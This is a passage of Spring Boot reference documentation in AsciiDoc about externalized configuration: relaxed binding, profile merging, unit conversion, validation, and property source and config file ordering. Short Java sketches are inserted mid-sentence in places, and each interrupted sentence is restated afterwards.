<<features#features.external-config.typesafe-configuration-properties.relaxed-binding.environment-variables>>).\n| Numeric values surrounded by underscores (see <<features#features.external-config.typesafe-configuration-properties.relaxed-binding.environment-variables>>)\n\n| System properties\n| Camel case, kebab case, or underscore notation\n| Standard list syntax using `[ ]` or comma-separated values\n|===\n\nTIP: We recommend that, when possible, properties are stored in lower-case kebab format, such as `my.person.first-name=Rod`.\n\n\n\n[[features.external-config.typesafe-configuration-properties.relaxed-binding.maps]]\n===== Binding Maps\nWhen binding to `Map` properties you may need to use a special bracket notation so that the original `key` value is preserved.\nIf the key is not surrounded by `[]`, any characters that are not alpha-numeric, `-` or `.` are removed.\n\nFor example, consider binding the following properties to a `Map<String,String>`:\n\n\n[source,properties,indent=0,subs=\"verbatim\",role=\"primary\"]\n.Properties\n----\n\tmy.map.[\/key1]=value1\n\tmy.map.[\/key2]=value2\n\tmy.map.\/key3=value3\n----\n\n[source,yaml,indent=0,subs=\"verbatim\",role=\"secondary\"]\n.Yaml\n----\n\tmy:\n\t map:\n\t \"[\/key1]\": \"value1\"\n\t \"[\/key2]\": \"value2\"\n\t \"\/key3\": \"value3\"\n----\n\nNOTE: For YAML files, the brackets need to be surrounded by quotes for the keys to be parsed properly.\n\nThe properties above will bind to a `Map` with `\/key1`, `\/key2` and `key3` as the keys in the map.\nThe slash has been removed from `key3` because it was not surrounded by square brackets.\n\nWhen binding to scalar values, keys with `.` in them do not need to be surrounded by `[]`.\nScalar values include enums and all types in the `java.lang` package except for `Object`.\nBinding `a.b=c` to `Map<String, String>` will preserve the `.` in the key and return a Map with the entry `{\"a.b\"=\"c\"}`.\nFor any other types you 
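need the bracket notation whenever a key contains a `.`.\n\nA holder for the `my.map` entries shown above might look like this sketch (the class name is hypothetical; since the binder can mutate an initialized `Map`, a getter is sufficient):\n\n[source,java,indent=0,subs=\"verbatim\"]\n----\n\timport java.util.HashMap;\n\timport java.util.Map;\n\n\timport org.springframework.boot.context.properties.ConfigurationProperties;\n\n\t@ConfigurationProperties(\"my\")\n\tpublic class MyMapProperties {\n\n\t\tprivate final Map<String, String> map = new HashMap<>();\n\n\t\tpublic Map<String, String> getMap() {\n\t\t\treturn this.map;\n\t\t}\n\n\t}\n----\n\nTo restate the rule: for any other types you 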
need to use the bracket notation if your `key` contains a `.`.\nFor example, binding `a.b=c` to `Map<String, Object>` will return a Map with the entry `{\"a\"={\"b\"=\"c\"}}` whereas `[a.b]=c` will return a Map with the entry `{\"a.b\"=\"c\"}`.\n\n\n\n[[features.external-config.typesafe-configuration-properties.relaxed-binding.environment-variables]]\n===== Binding from Environment Variables\nMost operating systems impose strict rules around the names that can be used for environment variables.\nFor example, Linux shell variables can contain only letters (`a` to `z` or `A` to `Z`), numbers (`0` to `9`) or the underscore character (`_`).\nBy convention, Unix shell variables will also have their names in UPPERCASE.\n\nSpring Boot's relaxed binding rules are, as much as possible, designed to be compatible with these naming restrictions.\n\nTo convert a property name in the canonical-form to an environment variable name you can follow these rules:\n\n* Replace dots (`.`) with underscores (`_`).\n* Remove any dashes (`-`).\n* Convert to uppercase.\n\nFor example, the configuration property `spring.main.log-startup-info` would be an environment variable named `SPRING_MAIN_LOGSTARTUPINFO`.\n\nEnvironment variables can also be used when binding to object lists.\nTo bind to a `List`, the element number should be surrounded with underscores in the variable name.\n\nFor example, the configuration property `my.service[0].other` would use an environment variable named `MY_SERVICE_0_OTHER`.\n\n\n\n[[features.external-config.typesafe-configuration-properties.merging-complex-types]]\n==== Merging Complex Types\nWhen lists are configured in more than one place, overriding works by replacing the entire list.\n\nFor example, assume a `MyPojo` object with `name` and `description` attributes that are `null` by default.\nThe following example exposes a list of `MyPojo` objects from `MyProperties`:\n\n[source,java,indent=0,subs=\"verbatim\"]\n----\ninclude::{docs-java}\/features\/externalconfig\/typesafeconfigurationproperties\/mergingcomplextypes\/list\/MyProperties.java[]\n----\n\nConsider the following configuration:\n\n[source,yaml,indent=0,subs=\"verbatim\",configblocks]\n----\n\tmy:\n\t list:\n\t - name: \"my name\"\n\t description: \"my description\"\n\t---\n\tspring:\n\t config:\n\t activate:\n\t on-profile: \"dev\"\n\tmy:\n\t list:\n\t - name: \"my another name\"\n----\n\nIf the `dev` profile is not active, `MyProperties.list` contains one `MyPojo` entry, as previously defined.\nIf the `dev` profile is enabled, however, the `list` _still_ contains only one entry (with a name of `my another name` and a description of `null`).\nThis configuration _does not_ add a second `MyPojo` instance to the list, and it does not merge the items.\n\nWhen a `List` is specified in multiple profiles, the one with the highest priority (and only that one) is used.\nConsider the following example:\n\n[source,yaml,indent=0,subs=\"verbatim\",configblocks]\n----\n\tmy:\n\t list:\n\t - name: \"my name\"\n\t description: \"my description\"\n\t - name: \"another name\"\n\t description: \"another description\"\n\t---\n\tspring:\n\t config:\n\t activate:\n\t on-profile: \"dev\"\n\tmy:\n\t list:\n\t - name: \"my another name\"\n----\n\nIn the preceding example, if the `dev` profile is active, `MyProperties.list` contains _one_ `MyPojo` entry (with a name of `my another name` and a description of `null`).\nFor YAML, both comma-separated lists and YAML lists can be used for completely overriding the contents of the list.\n\nFor `Map` 
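properties, the behavior is different.\n\nThe list examples above assume a holder class shaped roughly like the following sketch (consistent with the `MyPojo` description, whose `name` and `description` fields are plain JavaBean properties):\n\n[source,java,indent=0,subs=\"verbatim\"]\n----\n\timport java.util.ArrayList;\n\timport java.util.List;\n\n\timport org.springframework.boot.context.properties.ConfigurationProperties;\n\n\t@ConfigurationProperties(\"my\")\n\tpublic class MyProperties {\n\n\t\tprivate final List<MyPojo> list = new ArrayList<>();\n\n\t\tpublic List<MyPojo> getList() {\n\t\t\treturn this.list;\n\t\t}\n\n\t}\n----\n\nFor `Map` 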
properties, you can bind with property values drawn from multiple sources.\nHowever, for the same property in multiple sources, the one with the highest priority is used.\nThe following example exposes a `Map<String, MyPojo>` from `MyProperties`:\n\n[source,java,indent=0,subs=\"verbatim\"]\n----\ninclude::{docs-java}\/features\/externalconfig\/typesafeconfigurationproperties\/mergingcomplextypes\/map\/MyProperties.java[]\n----\n\nConsider the following configuration:\n\n[source,yaml,indent=0,subs=\"verbatim\",configblocks]\n----\n\tmy:\n\t map:\n\t key1:\n\t name: \"my name 1\"\n\t description: \"my description 1\"\n\t---\n\tspring:\n\t config:\n\t activate:\n\t on-profile: \"dev\"\n\tmy:\n\t map:\n\t key1:\n\t name: \"dev name 1\"\n\t key2:\n\t name: \"dev name 2\"\n\t description: \"dev description 2\"\n----\n\nIf the `dev` profile is not active, `MyProperties.map` contains one entry with key `key1` (with a name of `my name 1` and a description of `my description 1`).\nIf the `dev` profile is enabled, however, `map` contains two entries with keys `key1` (with a name of `dev name 1` and a description of `my description 1`) and `key2` (with a name of `dev name 2` and a description of `dev description 2`).\n\nNOTE: The preceding merging rules apply to properties from all property sources, and not just files.\n\n\n\n[[features.external-config.typesafe-configuration-properties.conversion]]\n==== Properties Conversion\nSpring Boot attempts to coerce the external application properties to the right type when it binds to the `@ConfigurationProperties` beans.\nIf you need custom type conversion, you can provide a `ConversionService` bean (with a bean named `conversionService`) or custom property editors (through a `CustomEditorConfigurer` bean) or custom `Converters` (with bean definitions annotated as `@ConfigurationPropertiesBinding`).\n\nNOTE: As this bean is requested very early during the application lifecycle, make sure to limit the dependencies that your `ConversionService` is using.\nTypically, any dependency that you require may not be fully initialized at creation time.\nYou may want to rename your custom `ConversionService` if it is not required for configuration keys coercion and only rely on custom converters qualified with `@ConfigurationPropertiesBinding`.\n\n\n\n[[features.external-config.typesafe-configuration-properties.conversion.durations]]\n===== Converting Durations\nSpring Boot has dedicated support for expressing durations.\nIf you expose a `java.time.Duration` property, the following formats in application properties are available:\n\n* A regular `long` representation (using milliseconds as the default unit unless a `@DurationUnit` has been specified)\n* The standard ISO-8601 format {java-api}\/java\/time\/Duration.html#parse-java.lang.CharSequence-[used by `java.time.Duration`]\n* A more readable format where the value and the unit are coupled (`10s` means 10 seconds)\n\nConsider the following example:\n\n[source,java,indent=0,subs=\"verbatim\"]\n----\ninclude::{docs-java}\/features\/externalconfig\/typesafeconfigurationproperties\/conversion\/durations\/javabeanbinding\/MyProperties.java[]\n----\n\nTo specify a session timeout of 30 seconds, `30`, `PT30S` and `30s` are all equivalent.\nA read timeout of 500ms can be specified in any of the following form: `500`, `PT0.5S` and `500ms`.\n\nYou can also use any of the supported units.\nThese are:\n\n* `ns` for nanoseconds\n* `us` for microseconds\n* `ms` for milliseconds\n* `s` for seconds\n* `m` for minutes\n* `h` for 
hours\n* `d` for days\n\nThe default unit is milliseconds and can be overridden using `@DurationUnit` as illustrated in the sample above.\n\nIf you prefer to use constructor binding, the same properties can be exposed, as shown in the following example:\n\n[source,java,indent=0,subs=\"verbatim\"]\n----\ninclude::{docs-java}\/features\/externalconfig\/typesafeconfigurationproperties\/conversion\/durations\/constructorbinding\/MyProperties.java[]\n----\n\n\nTIP: If you are upgrading a `Long` property, make sure to define the unit (using `@DurationUnit`) if it is not milliseconds.\nDoing so gives a transparent upgrade path while supporting a much richer format.\n\n\n\n[[features.external-config.typesafe-configuration-properties.conversion.periods]]\n===== Converting periods\nIn addition to durations, Spring Boot can also work with the `java.time.Period` type.\nThe following formats can be used in application properties:\n\n* A regular `int` representation (using days as the default unit unless a `@PeriodUnit` has been specified)\n* The standard ISO-8601 format {java-api}\/java\/time\/Period.html#parse-java.lang.CharSequence-[used by `java.time.Period`]\n* A simpler format where the value and unit pairs are coupled (`1y3d` means 1 year and 3 days)\n\nThe following units are supported with the simple format:\n\n* `y` for years\n* `m` for months\n* `w` for weeks\n* `d` for days\n\nNOTE: The `java.time.Period` type never actually stores the number of weeks; it is a shortcut that means \"`7 days`\".\n\n\n\n[[features.external-config.typesafe-configuration-properties.conversion.data-sizes]]\n===== Converting Data Sizes\nSpring Framework has a `DataSize` value type that expresses a size in bytes.\nIf you expose a `DataSize` property, the following formats in application properties are available:\n\n* A regular `long` representation (using bytes as the default unit unless a `@DataSizeUnit` has been specified)\n* A more readable format where the value and the unit are coupled (`10MB` means 10 megabytes)\n\nConsider the following example:\n\n[source,java,indent=0,subs=\"verbatim\"]\n----\ninclude::{docs-java}\/features\/externalconfig\/typesafeconfigurationproperties\/conversion\/datasizes\/javabeanbinding\/MyProperties.java[]\n----\n\nTo specify a buffer size of 10 megabytes, `10` and `10MB` are equivalent.\nA size threshold of 256 bytes can be specified as `256` or `256B`.\n\nYou can also use any of the supported units.\nThese are:\n\n* `B` for bytes\n* `KB` for kilobytes\n* `MB` for megabytes\n* `GB` for gigabytes\n* `TB` for terabytes\n\nThe default unit is bytes and can be overridden using `@DataSizeUnit` as illustrated in the sample above.\n\nIf you prefer to use constructor binding, the same properties can be exposed, as shown in the following example:\n\n[source,java,indent=0,subs=\"verbatim\"]\n----\ninclude::{docs-java}\/features\/externalconfig\/typesafeconfigurationproperties\/conversion\/datasizes\/constructorbinding\/MyProperties.java[]\n----\n\nTIP: If you are upgrading a `Long` property, make sure to define the unit (using `@DataSizeUnit`) if it is not bytes.\nDoing so gives a transparent upgrade path while supporting a much richer format.
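\n\nPulling the conversion examples together, a properties class using these types might look like the following sketch (the class and field names are hypothetical):\n\n[source,java,indent=0,subs=\"verbatim\"]\n----\n\timport java.time.Duration;\n\timport java.time.temporal.ChronoUnit;\n\n\timport org.springframework.boot.context.properties.ConfigurationProperties;\n\timport org.springframework.boot.convert.DataSizeUnit;\n\timport org.springframework.boot.convert.DurationUnit;\n\timport org.springframework.util.unit.DataSize;\n\timport org.springframework.util.unit.DataUnit;\n\n\t@ConfigurationProperties(\"my\")\n\tpublic class MyConversionProperties {\n\n\t\t\/\/ \"30\", \"PT30S\" and \"30s\" are all thirty seconds here\n\t\t@DurationUnit(ChronoUnit.SECONDS)\n\t\tprivate Duration sessionTimeout = Duration.ofSeconds(30);\n\n\t\t\/\/ \"10\" and \"10MB\" are both ten megabytes here\n\t\t@DataSizeUnit(DataUnit.MEGABYTES)\n\t\tprivate DataSize bufferSize = DataSize.ofMegabytes(2);\n\n\t\t\/\/ getters and setters follow the JavaBean pattern described earlier\n\n\t}\n----\n\n\n\n[[features.external-config.typesafe-configuration-properties.validation]]\n==== @ConfigurationProperties Validation\nSpring Boot attempts to validate `@ConfigurationProperties` classes whenever they are annotated with Spring's `@Validated` annotation.\nYou can use JSR-303 `javax.validation` constraint annotations directly on your configuration 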
class.\nTo do so, ensure that a compliant JSR-303 implementation is on your classpath and then add constraint annotations to your fields, as shown in the following example:\n\n[source,java,indent=0,subs=\"verbatim\"]\n----\ninclude::{docs-java}\/features\/externalconfig\/typesafeconfigurationproperties\/validate\/MyProperties.java[]\n----\n\nTIP: You can also trigger validation by annotating the `@Bean` method that creates the configuration properties with `@Validated`.\n\nTo ensure that validation is always triggered for nested properties, even when no properties are found, the associated field must be annotated with `@Valid`.\nThe following example builds on the preceding `MyProperties` example:\n\n[source,java,indent=0,subs=\"verbatim\"]\n----\ninclude::{docs-java}\/features\/externalconfig\/typesafeconfigurationproperties\/validate\/nested\/MyProperties.java[]\n----\n\nYou can also add a custom Spring `Validator` by creating a bean definition called `configurationPropertiesValidator`.\nThe `@Bean` method should be declared `static`.\nThe configuration properties validator is created very early in the application's lifecycle, and declaring the `@Bean` method as static lets the bean be created without having to instantiate the `@Configuration` class.\nDoing so avoids any problems that may be caused by early instantiation.\n\nTIP: The `spring-boot-actuator` module includes an endpoint that exposes all `@ConfigurationProperties` beans.\nPoint your web browser to `\/actuator\/configprops` or use the equivalent JMX endpoint.\nSee the \"<<actuator#actuator.endpoints, Production ready features>>\" section for details.\n\n\n\n[[features.external-config.typesafe-configuration-properties.vs-value-annotation]]\n==== @ConfigurationProperties vs. @Value\nThe `@Value` annotation is a core container feature, and it does not provide the same features as type-safe configuration properties.\nThe following table summarizes the features that are supported by `@ConfigurationProperties` and `@Value`:\n\n[cols=\"4,2,2\"]\n|===\n| Feature |`@ConfigurationProperties` |`@Value`\n\n| <<features#features.external-config.typesafe-configuration-properties.relaxed-binding,Relaxed binding>>\n| Yes\n| Limited (see <<features#features.external-config.typesafe-configuration-properties.vs-value-annotation.note,note below>>)\n\n| <<configuration-metadata#appendix.configuration-metadata,Meta-data support>>\n| Yes\n| No\n\n| `SpEL` evaluation\n| No\n| Yes\n|===\n\n[[features.external-config.typesafe-configuration-properties.vs-value-annotation.note]]\n[NOTE]\n====\nIf you do want to use `@Value`, we recommend that you refer to property names using their canonical form (kebab-case using only lowercase letters).\nThis will allow Spring Boot to use the same logic as it does when <<features#features.external-config.typesafe-configuration-properties.relaxed-binding, relaxed binding>> `@ConfigurationProperties`.\n\nFor example, `@Value(\"$\\{demo.item-price}\")` will pick up `demo.item-price` and `demo.itemPrice` forms from the `application.properties` file, as well as `DEMO_ITEMPRICE` from the system environment.\nIf you used `@Value(\"$\\{demo.itemPrice}\")` instead, `demo.item-price` and `DEMO_ITEMPRICE` would not be considered.\n====\n\nIf you define a set of configuration keys for your own components, we recommend you group them in a POJO annotated with `@ConfigurationProperties`.\nDoing so will provide you with a structured, type-safe object that you can inject into your own beans.
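\n\nInjection then looks like any other bean dependency, as in this sketch:\n\n[source,java,indent=0,subs=\"verbatim\"]\n----\n\timport org.springframework.stereotype.Service;\n\n\t@Service\n\tpublic class MyService {\n\n\t\tprivate final MyProperties properties;\n\n\t\tpublic MyService(MyProperties properties) {\n\t\t\tthis.properties = properties;\n\t\t}\n\n\t\t\/\/ read settings from this.properties instead of scattering @Value fields\n\n\t}\n----\n\n`SpEL` expressions from 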
<<features#features.external-config.files,application property files>> are not processed at time of parsing these files and populating the environment.\nHowever, it is possible to write a `SpEL` expression in `@Value`.\nIf the value of a property from an application property file is a `SpEL` expression, it will be evaluated when consumed through `@Value`.\n","old_contents":"[[features.external-config]]\n== Externalized Configuration\nSpring Boot lets you externalize your configuration so that you can work with the same application code in different environments.\nYou can use a variety of external configuration sources, include Java properties files, YAML files, environment variables, and command-line arguments.\n\nProperty values can be injected directly into your beans by using the `@Value` annotation, accessed through Spring's `Environment` abstraction, or be <<features#features.external-config.typesafe-configuration-properties,bound to structured objects>> through `@ConfigurationProperties`.\n\nSpring Boot uses a very particular `PropertySource` order that is designed to allow sensible overriding of values.\nProperties are considered in the following order (with values from lower items overriding earlier ones):\n\n. Default properties (specified by setting `SpringApplication.setDefaultProperties`).\n. {spring-framework-api}\/context\/annotation\/PropertySource.html[`@PropertySource`] annotations on your `@Configuration` classes.\n Please note that such property sources are not added to the `Environment` until the application context is being refreshed.\n This is too late to configure certain properties such as `+logging.*+` and `+spring.main.*+` which are read before refresh begins.\n. Config data (such as `application.properties` files).\n. A `RandomValuePropertySource` that has properties only in `+random.*+`.\n. OS environment variables.\n. Java System properties (`System.getProperties()`).\n. JNDI attributes from `java:comp\/env`.\n. `ServletContext` init parameters.\n. `ServletConfig` init parameters.\n. Properties from `SPRING_APPLICATION_JSON` (inline JSON embedded in an environment variable or system property).\n. Command line arguments.\n. `properties` attribute on your tests.\n Available on {spring-boot-test-module-api}\/context\/SpringBootTest.html[`@SpringBootTest`] and the <<features#features.testing.spring-boot-applications.autoconfigured-tests,test annotations for testing a particular slice of your application>>.\n. {spring-framework-api}\/test\/context\/TestPropertySource.html[`@TestPropertySource`] annotations on your tests.\n. <<using#using.devtools.globalsettings,Devtools global settings properties>> in the `$HOME\/.config\/spring-boot` directory when devtools is active.\n\nConfig data files are considered in the following order:\n\n. <<features#features.external-config.files,Application properties>> packaged inside your jar (`application.properties` and YAML variants).\n. <<features#features.external-config.files.profile-specific,Profile-specific application properties>> packaged inside your jar (`application-\\{profile}.properties` and YAML variants).\n. <<features#features.external-config.files,Application properties>> outside of your packaged jar (`application.properties` and YAML variants).\n. 
<<features#features.external-config.files.profile-specific,Profile-specific application properties>> outside of your packaged jar (`application-\\{profile}.properties` and YAML variants).\n\nNOTE: It is recommended to stick with one format for your entire application.\nIf you have configuration files with both `.properties` and `.yml` format in the same location, `.properties` takes precedence.\n\nTo provide a concrete example, suppose you develop a `@Component` that uses a `name` property, as shown in the following example:\n\n[source,java,indent=0,subs=\"verbatim\"]\n----\ninclude::{docs-java}\/features\/externalconfig\/MyBean.java[]\n----\n\nOn your application classpath (for example, inside your jar) you can have an `application.properties` file that provides a sensible default property value for `name`.\nWhen running in a new environment, an `application.properties` file can be provided outside of your jar that overrides the `name`.\nFor one-off testing, you can launch with a specific command line switch (for example, `java -jar app.jar --name=\"Spring\"`).\n\nTIP: The `env` and `configprops` endpoints can be useful in determining why a property has a particular value.\nYou can use these two endpoints to diagnose unexpected property values.\nSee the \"<<actuator#actuator.endpoints, Production ready features>>\" section for details.\n\n\n\n[[features.external-config.command-line-args]]\n=== Accessing Command Line Properties\nBy default, `SpringApplication` converts any command line option arguments (that is, arguments starting with `--`, such as `--server.port=9000`) to a `property` and adds them to the Spring `Environment`.\nAs mentioned previously, command line properties always take precedence over file-based property sources.\n\nIf you do not want command line properties to be added to the `Environment`, you can disable them by using `SpringApplication.setAddCommandLineProperties(false)`.\n\n\n\n[[features.external-config.application-json]]\n=== JSON Application Properties\nEnvironment variables and system properties often have restrictions that mean some property names cannot be used.\nTo help with this, Spring Boot allows you to encode a block of properties into a single JSON structure.\n\nWhen your application starts, any `spring.application.json` or `SPRING_APPLICATION_JSON` properties will be parsed and added to the `Environment`.\n\nFor example, the `SPRING_APPLICATION_JSON` property can be supplied on the command line in a UN{asterisk}X shell as an environment variable:\n\n[source,shell,indent=0,subs=\"verbatim\"]\n----\n\t$ SPRING_APPLICATION_JSON='{\"my\":{\"name\":\"test\"}}' java -jar myapp.jar\n----\n\nIn the preceding example, you end up with `my.name=test` in the Spring `Environment`.\n\nThe same JSON can also be provided as a system property:\n\n[source,shell,indent=0,subs=\"verbatim\"]\n----\n\t$ java -Dspring.application.json='{\"my\":{\"name\":\"test\"}}' -jar myapp.jar\n----\n\nOr you could supply the JSON by using a command line argument:\n\n[source,shell,indent=0,subs=\"verbatim\"]\n----\n\t$ java -jar myapp.jar --spring.application.json='{\"my\":{\"name\":\"test\"}}'\n----\n\nIf you are deploying to a classic Application Server, you could also use a JNDI variable named `java:comp\/env\/spring.application.json`.\n\nNOTE: Although `null` values from the JSON will be added to the resulting property source, the `PropertySourcesPropertyResolver` treats `null` properties as missing values.\nThis means that the JSON cannot override properties from lower order 
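property sources by supplying `null`.\n\nLooking back at the `name` example above, the referenced `MyBean` component might look roughly like this sketch:\n\n[source,java,indent=0,subs=\"verbatim\"]\n----\n\timport org.springframework.beans.factory.annotation.Value;\n\timport org.springframework.stereotype.Component;\n\n\t@Component\n\tpublic class MyBean {\n\n\t\t\/\/ resolved from the Environment, so it can come from any of the sources above\n\t\t@Value(\"${name}\")\n\t\tprivate String name;\n\n\t}\n----\n\nTo repeat the caveat: the JSON cannot override values from lower order 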
property sources with a `null` value.\n\n\n\n[[features.external-config.files]]\n=== External Application Properties [[features.external-config.files]]\nSpring Boot will automatically find and load `application.properties` and `application.yaml` files from the following locations when your application starts:\n\n. From the classpath\n.. The classpath root\n.. The classpath `\/config` package\n. From the current directory\n.. The current directory\n.. The `\/config` subdirectory in the current directory\n.. Immediate child directories of the `\/config` subdirectory\n\nThe list is ordered by precedence (with values from lower items overriding earlier ones).\nDocuments from the loaded files are added as `PropertySources` to the Spring `Environment`.\n\nIf you do not like `application` as the configuration file name, you can switch to another file name by specifying a configprop:spring.config.name[] environment property.\nFor example, to look for `myproject.properties` and `myproject.yaml` files you can run your application as follows:\n\n[source,shell,indent=0,subs=\"verbatim\"]\n----\n\t$ java -jar myproject.jar --spring.config.name=myproject\n----\n\nYou can also refer to an explicit location by using the configprop:spring.config.location[] environment property.\nThis property accepts a comma-separated list of one or more locations to check.\n\nThe following example shows how to specify two distinct files:\n\n[source,shell,indent=0,subs=\"verbatim\"]\n----\n\t$ java -jar myproject.jar --spring.config.location=\\\n\t\toptional:classpath:\/default.properties,\\\n\t\toptional:classpath:\/override.properties\n----\n\nTIP: Use the prefix `optional:` if the <<features#features.external-config.files.optional-prefix,locations are optional>> and you do not mind if they do not exist.\n\nWARNING: `spring.config.name`, `spring.config.location`, and `spring.config.additional-location` are used very early to determine which files have to be loaded.\nThey must be defined as an environment property (typically an OS environment variable, a system property, or a command-line argument).\n\nIf `spring.config.location` contains directories (as opposed to files), they should end in `\/`.\nAt runtime they will be appended with the names generated from `spring.config.name` before being loaded.\nFiles specified in `spring.config.location` are imported directly.\n\nNOTE: Both directory and file location values are also expanded to check for <<features#features.external-config.files.profile-specific,profile-specific files>>.\nFor example, if you have a `spring.config.location` of `classpath:myconfig.properties`, you will also find appropriate `classpath:myconfig-<profile>.properties` files are loaded.\n\nIn most situations, each configprop:spring.config.location[] item you add will reference a single file or directory.\nLocations are processed in the order that they are defined and later ones can override the values of earlier ones.\n\n[[features.external-config.files.location-groups]]\nIf you have a complex location setup, and you use profile-specific configuration files, you may need to provide further hints so that Spring Boot knows how they should be grouped.\nA location group is a collection of locations that are all considered at the same level.\nFor example, you might want to group all classpath locations, then all external locations.\nItems within a location group should be separated with `;`.\nSee the example in the \"`<<features#features.external-config.files.profile-specific>>`\" section for more 
details.\n\nLocations configured by using `spring.config.location` replace the default locations.\nFor example, if `spring.config.location` is configured with the value `optional:classpath:\/custom-config\/,optional:file:.\/custom-config\/`, the complete set of locations considered is:\n\n. `optional:classpath:custom-config\/`\n. `optional:file:.\/custom-config\/`\n\nIf you prefer to add additional locations, rather than replacing them, you can use `spring.config.additional-location`.\nProperties loaded from additional locations can override those in the default locations.\nFor example, if `spring.config.additional-location` is configured with the value `optional:classpath:\/custom-config\/,optional:file:.\/custom-config\/`, the complete set of locations considered is:\n\n. `optional:classpath:\/;optional:classpath:\/config\/`\n. `optional:file:.\/;optional:file:.\/config\/;optional:file:.\/config\/*\/`\n. `optional:classpath:custom-config\/`\n. `optional:file:.\/custom-config\/`\n\nThis search ordering lets you specify default values in one configuration file and then selectively override those values in another.\nYou can provide default values for your application in `application.properties` (or whatever other basename you choose with `spring.config.name`) in one of the default locations.\nThese default values can then be overridden at runtime with a different file located in one of the custom locations.\n\nNOTE: If you use environment variables rather than system properties, most operating systems disallow period-separated key names, but you can use underscores instead (for example, configprop:spring.config.name[format=envvar] instead of configprop:spring.config.name[]).\nSee <<features#features.external-config.typesafe-configuration-properties.relaxed-binding.environment-variables>> for details.\n\nNOTE: If your application runs in a servlet container or application server, then JNDI properties (in `java:comp\/env`) or servlet context initialization parameters can be used instead of, or as well as, environment variables or system properties.\n\n\n\n[[features.external-config.files.optional-prefix]]\n==== Optional Locations\nBy default, when a specified config data location does not exist, Spring Boot will throw a `ConfigDataLocationNotFoundException` and your application will not start.\n\nIf you want to specify a location, but you do not mind if it does not always exist, you can use the `optional:` prefix.\nYou can use this prefix with the `spring.config.location` and `spring.config.additional-location` properties, as well as with <<features#features.external-config.files.importing, `spring.config.import`>> declarations.\n\nFor example, a `spring.config.import` value of `optional:file:.\/myconfig.properties` allows your application to start, even if the `myconfig.properties` file is missing.\n\nIf you want to ignore all `ConfigDataLocationNotFoundExceptions` and always continue to start your application, you can use the `spring.config.on-not-found` property.\nSet the value to `ignore` using `SpringApplication.setDefaultProperties(...)` or with a system\/environment variable.\n\n\n\n[[features.external-config.files.wildcard-locations]]\n==== Wildcard Locations\nIf a config file location includes the `{asterisk}` character for the last path segment, it is considered a wildcard location.\nWildcards are expanded when the config is loaded so that immediate subdirectories are also checked.\nWildcard locations are particularly useful in an environment such as Kubernetes when there are 
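several mounted sources of configuration.\n\nAs a brief sketch of the `spring.config.on-not-found` setting described in the previous section, set programmatically through `SpringApplication.setDefaultProperties(...)`:\n\n[source,java,indent=0,subs=\"verbatim\"]\n----\n\timport java.util.Map;\n\n\timport org.springframework.boot.SpringApplication;\n\timport org.springframework.boot.autoconfigure.SpringBootApplication;\n\n\t@SpringBootApplication\n\tpublic class MyApplication {\n\n\t\tpublic static void main(String[] args) {\n\t\t\tSpringApplication application = new SpringApplication(MyApplication.class);\n\t\t\t\/\/ continue startup even when a config data location does not exist\n\t\t\tapplication.setDefaultProperties(Map.of(\"spring.config.on-not-found\", \"ignore\"));\n\t\t\tapplication.run(args);\n\t\t}\n\n\t}\n----\n\nReturning to wildcards: they are particularly useful in environments such as Kubernetes when there are 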
multiple sources of config properties.\n\nFor example, if you have some Redis configuration and some MySQL configuration, you might want to keep those two pieces of configuration separate, while requiring that both those are present in an `application.properties` file.\nThis might result in two separate `application.properties` files mounted at different locations such as `\/config\/redis\/application.properties` and `\/config\/mysql\/application.properties`.\nIn such a case, having a wildcard location of `config\/*\/`, will result in both files being processed.\n\nBy default, Spring Boot includes `config\/*\/` in the default search locations.\nIt means that all subdirectories of the `\/config` directory outside of your jar will be searched.\n\nYou can use wildcard locations yourself with the `spring.config.location` and `spring.config.additional-location` properties.\n\nNOTE: A wildcard location must contain only one `{asterisk}` and end with `{asterisk}\/` for search locations that are directories or `*\/<filename>` for search locations that are files.\nLocations with wildcards are sorted alphabetically based on the absolute path of the file names.\n\nTIP: Wildcard locations only work with external directories.\nYou cannot use a wildcard in a `classpath:` location.\n\n\n\n[[features.external-config.files.profile-specific]]\n==== Profile Specific Files\nAs well as `application` property files, Spring Boot will also attempt to load profile-specific files using the naming convention `application-\\{profile}`.\nFor example, if your application activates a profile named `prod` and uses YAML files, then both `application.yml` and `application-prod.yml` will be considered.\n\nProfile-specific properties are loaded from the same locations as standard `application.properties`, with profile-specific files always overriding the non-specific ones.\nIf several profiles are specified, a last-wins strategy applies.\nFor example, if profiles `prod,live` are specified by the configprop:spring.profiles.active[] property, values in `application-prod.properties` can be overridden by those in `application-live.properties`.\n\n[NOTE]\n====\nThe last-wins strategy applies at the <<features#features.external-config.files.location-groups,location group>> level.\nA configprop:spring.config.location[] of `classpath:\/cfg\/,classpath:\/ext\/` will not have the same override rules as `classpath:\/cfg\/;classpath:\/ext\/`.\n\nFor example, continuing our `prod,live` example above, we might have the following files:\n\n----\n\/cfg\n application-live.properties\n\/ext\n application-live.properties\n application-prod.properties\n----\n\nWhen we have a configprop:spring.config.location[] of `classpath:\/cfg\/,classpath:\/ext\/` we process all `\/cfg` files before all `\/ext` files:\n\n. `\/cfg\/application-live.properties`\n. `\/ext\/application-prod.properties`\n. `\/ext\/application-live.properties`\n\n\nWhen we have `classpath:\/cfg\/;classpath:\/ext\/` instead (with a `;` delimiter) we process `\/cfg` and `\/ext` at the same level:\n\n. `\/ext\/application-prod.properties`\n. `\/cfg\/application-live.properties`\n. 
`\/ext\/application-live.properties`\n====\n\nThe `Environment` has a set of default profiles (by default, `[default]`) that are used if no active profiles are set.\nIn other words, if no profiles are explicitly activated, then properties from `application-default` are considered.\n\nNOTE: Properties files are only ever loaded once.\nIf you have already directly <<features#features.external-config.files.importing,imported>> a profile specific property files then it will not be imported a second time.\n\n\n\n[[features.external-config.files.importing]]\n==== Importing Additional Data\nApplication properties may import further config data from other locations using the `spring.config.import` property.\nImports are processed as they are discovered, and are treated as additional documents inserted immediately below the one that declares the import.\n\nFor example, you might have the following in your classpath `application.properties` file:\n\n[source,yaml,indent=0,subs=\"verbatim\",configblocks]\n----\n\tspring:\n\t application:\n\t name: \"myapp\"\n\t config:\n\t import: \"optional:file:.\/dev.properties\"\n----\n\nThis will trigger the import of a `dev.properties` file in current directory (if such a file exists).\nValues from the imported `dev.properties` will take precedence over the file that triggered the import.\nIn the above example, the `dev.properties` could redefine `spring.application.name` to a different value.\n\nAn import will only be imported once no matter how many times it is declared.\nThe order an import is defined inside a single document within the properties\/yaml file does not matter.\nFor instance, the two examples below produce the same result:\n\n[source,yaml,indent=0,subs=\"verbatim\",configblocks]\n----\n\tspring:\n\t config:\n\t import: \"my.properties\"\n\tmy:\n\t property: 